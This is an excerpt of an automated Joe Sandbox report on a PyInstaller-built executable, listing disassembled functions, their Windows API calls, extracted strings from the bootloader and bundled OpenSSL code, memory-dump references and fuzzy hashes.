Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: Fiber$Switch$CreateDelete
String ID: *$..\s\crypto\async\async.c
API String ID: 2050058302-1471988776
Opcode ID: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
Instruction ID: ec535f76c2062b59f24d164aac7fb0f816c3f5027497cc0ae0bff71ef8f8d015
Opcode Fuzzy Hash: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
Instruction Fuzzy Hash: BDA18C32B19A4282EB20DF16E460A7973A8FF44B94F488435DAAD477E9EF3CE545D700

Function 00007FFDF10C2E46 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFDF11CD832

Strings

~, xrefs: 00007FFDF11CD84C
~, xrefs: 00007FFDF11CD867
~, xrefs: 00007FFDF11CD8FC
OPENSSL_ia32cap, xrefs: 00007FFDF11CD808
~, xrefs: 00007FFDF11CD8E4

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: EnvironmentVariable
String ID: OPENSSL_ia32cap$~$~$~$~
API String ID: 1431749950-1981414212
Opcode ID: 2634814bda47d7719d861af1cfec94a442d099e0f6a35619a322e4b16ada4e8f
Instruction ID: f6397795fc6b6abbd92e9b22b57eb95a6970612f8f5ef0339d02f0160bdbe07b
Opcode Fuzzy Hash: 2634814bda47d7719d861af1cfec94a442d099e0f6a35619a322e4b16ada4e8f
Instruction Fuzzy Hash: 59418226F0875B87EB10AB41A4649F922E8FB58B80F444035D96D576DCEF3DE44AC740

Function 00007FF62664DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDBD
GetLastError.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE63
GetProcAddress.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE6F

Strings

api-ms-, xrefs: 00007FF62664DDDD

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: dc1dd23729fa22ae003e52b2d1ea072889ce2dd6ba4bf803454c64b692098f93
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: B931D021F0A68381EE229B02AC501B8A394FF58BA4F490535EE1D873C0EF7DE4449B43

Function 00007FFDF10C3779 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF1169C16

Strings

utf8only, xrefs: 00007FFDF1169C0C
pkix, xrefs: 00007FFDF1169BCF
MASK:, xrefs: 00007FFDF1169B4A
nombstr, xrefs: 00007FFDF1169B8F
default, xrefs: 00007FFDF1169C3A

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007B5630
String ID: MASK:$default$nombstr$pkix$utf8only
API String ID: 2248877218-3483942737
Opcode ID: 56a8b705b4d859711014d430f94cbbc3222095bc84f144be5c70752352c183a7
Instruction ID: 3ea729b9a7470146014a074a56508643a088b58d997eb451fd50facbb5a66cda
Opcode Fuzzy Hash: 56a8b705b4d859711014d430f94cbbc3222095bc84f144be5c70752352c183a7
Instruction Fuzzy Hash: 9C312322F185858BEB418B18E470BB93B94EB85750F844232EB6E436D9DF2DE491C700

Function 00007FF626642A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62664351A,?,00000000,00007FF626643F23), ref: 00007FF626642AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF626642B0F
Warning, xrefs: 00007FF626642B1E
WARNING, xrefs: 00007FF626642AAF
0, xrefs: 00007FF626642B16
[PYI-%d:%s] , xrefs: 00007FF626642AA8

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 3707d47eab5bf1ef0d49f47ec56f42d6f9429d0dfec2962f956a368fa293a6aa
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: DC21AE32A18B8292EA209B51BC917EA6394FB887C4F400132FE8D93759DF7DD2559B42

Function 00007FF626648760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF626648780
OpenProcessToken.ADVAPI32 ref: 00007FF626648793
GetTokenInformation.ADVAPI32 ref: 00007FF6266487B8
GetLastError.KERNEL32 ref: 00007FF6266487C2
GetTokenInformation.ADVAPI32 ref: 00007FF626648802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62664881E
CloseHandle.KERNEL32 ref: 00007FF626648836

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
Instruction ID: 71a3e350bc318ab344050ccc4a8136ee90ffad9eb8f84e3045c560a7cf2206e8
Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
Instruction Fuzzy Hash: BA215831A0C68395DF109B59B854169A7A0FFC57A0F100235D66D83AE4DEADD4549F43

Function 00007FF62665B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF62665B1CF
FlsGetValue.KERNEL32 ref: 00007FF62665B1E4
FlsSetValue.KERNEL32 ref: 00007FF62665B205
FlsSetValue.KERNEL32 ref: 00007FF62665B232
FlsSetValue.KERNEL32 ref: 00007FF62665B243
FlsSetValue.KERNEL32 ref: 00007FF62665B254
SetLastError.KERNEL32 ref: 00007FF62665B26F

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: 49f71f9c23f1e9b9ed64852648cddfe5d10437cfa9a45b5b27e1caaa3223b5ad
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: 23214820E0C20786FE65A7619E6313D5142BF447A0F144634E93ECAAD7DE2FA400AF43

Function 00007FF626667DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF626667E0D
GetLastError.KERNEL32 ref: 00007FF626667E19
CloseHandle.KERNEL32 ref: 00007FF626667E31
CreateFileW.KERNEL32 ref: 00007FF626667E5C
WriteConsoleW.KERNEL32 ref: 00007FF626667E7B

Strings

CONOUT$, xrefs: 00007FF626667E3D

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 0cabc9d54a84eb1bb6e8698cd9d8ef80d2bf1fa14d70118ab14268c824f39381
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: B0116031B18A4286EB508B52FC54339A7A4FB88BE4F044234EA5DCB7A4DF7DD8549B42

Function 00007FF626648560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF626649216), ref: 00007FF626648592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266485E9

Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF626648678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF62664870A

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
Instruction ID: e9fbdee87210709e9c98904fdfba6af056407c53d33398781a02956b683732ee
Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
Instruction Fuzzy Hash: 90418322B196C281EE709F12A9606AA6394FB84BC4F440135DE4DD7B89DE7DE401DB03

Function 00007FFDF1554200 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 355COMMON

Download Yara Rule

APIs

00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF1554324
00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF15543D7

Strings

"%w" , xrefs: 00007FFDF15542B2
-, xrefs: 00007FFDF15546DB
%Q%s, xrefs: 00007FFDF1554544

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: 00007E103019
String ID: "%w" $%Q%s$-
API String ID: 2848303308-628927912
Opcode ID: 77611a162c6771daeffabd537d4af054408343021cd54e9f8853c5e37f3fccce
Instruction ID: 803941c2e680669e9a53d6ab4449dae570245a8f2e4c0f71028dc22c71535f68
Opcode Fuzzy Hash: 77611a162c6771daeffabd537d4af054408343021cd54e9f8853c5e37f3fccce
Instruction Fuzzy Hash: 4BE1E322B09A8286EB16CF55A460A7977A8FB55BC8F044135DE6E077EDEF3CE441C700

Function 00007FF6266490E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF626648760: GetCurrentProcess.KERNEL32 ref: 00007FF626648780
Part of subcall function 00007FF626648760: OpenProcessToken.ADVAPI32 ref: 00007FF626648793
Part of subcall function 00007FF626648760: GetTokenInformation.ADVAPI32 ref: 00007FF6266487B8
Part of subcall function 00007FF626648760: GetLastError.KERNEL32 ref: 00007FF6266487C2
Part of subcall function 00007FF626648760: GetTokenInformation.ADVAPI32 ref: 00007FF626648802
Part of subcall function 00007FF626648760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62664881E
Part of subcall function 00007FF626648760: CloseHandle.KERNEL32 ref: 00007FF626648836

LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF62664916C
LocalFree.KERNEL32(?,00007FF626643C55), ref: 00007FF626649175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF626649183
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF626649142
S-1-3-4, xrefs: 00007FF626649121
D:(A;;FA;;;%s), xrefs: 00007FF626649157

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 9aee3baf377f608468a8f842ebd0bd00518453cfd8b55bb820aefac7871e31fc
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: AD214F31A0874282EE24AB11ED253EA6365FF84780F444135EA4DD3796DF7EE845EB43

Function 00007FF62665B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B347
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B37D
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3CC
SetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3E7

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: 8d4df20984a9d2da6d39dd54753969e431821b778c3e6885988722b320830fc1
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: 0C116D20A0C64386FE54A3219E6313D6242BF447B0F144335E82EDA7C7DE2EA801AF43

Function 00007FFDF10C158C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 131COMMON

Download Yara Rule

APIs

00007FFE10301170.VCRUNTIME140 ref: 00007FFDF130443F

Strings

FALSE, xrefs: 00007FFDF13011DB, 00007FFDF13011F3
E, xrefs: 00007FFDF13044C1
..\s\crypto\x509v3\v3_utl.c, xrefs: 00007FFDF1304414, 00007FFDF1304450, 00007FFDF130446D, 00007FFDF13044C9, 00007FFDF13044F4, 00007FFDF1304509, 00007FFDF130451E
TRUE, xrefs: 00007FFDF13011B9, 00007FFDF13011D2

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007E10301170
String ID: ..\s\crypto\x509v3\v3_utl.c$E$FALSE$TRUE
API String ID: 1180092802-1433594941
Opcode ID: 16a9b9d49632f7cb94d3c9f1f1350a0e8ca290e2a8a4e567c459755ac0dea05e
Instruction ID: ab3f36fc15d21da24727214aa5b1b9da15a40f2570de725f4fece8b81fe915d7
Opcode Fuzzy Hash: 16a9b9d49632f7cb94d3c9f1f1350a0e8ca290e2a8a4e567c459755ac0dea05e
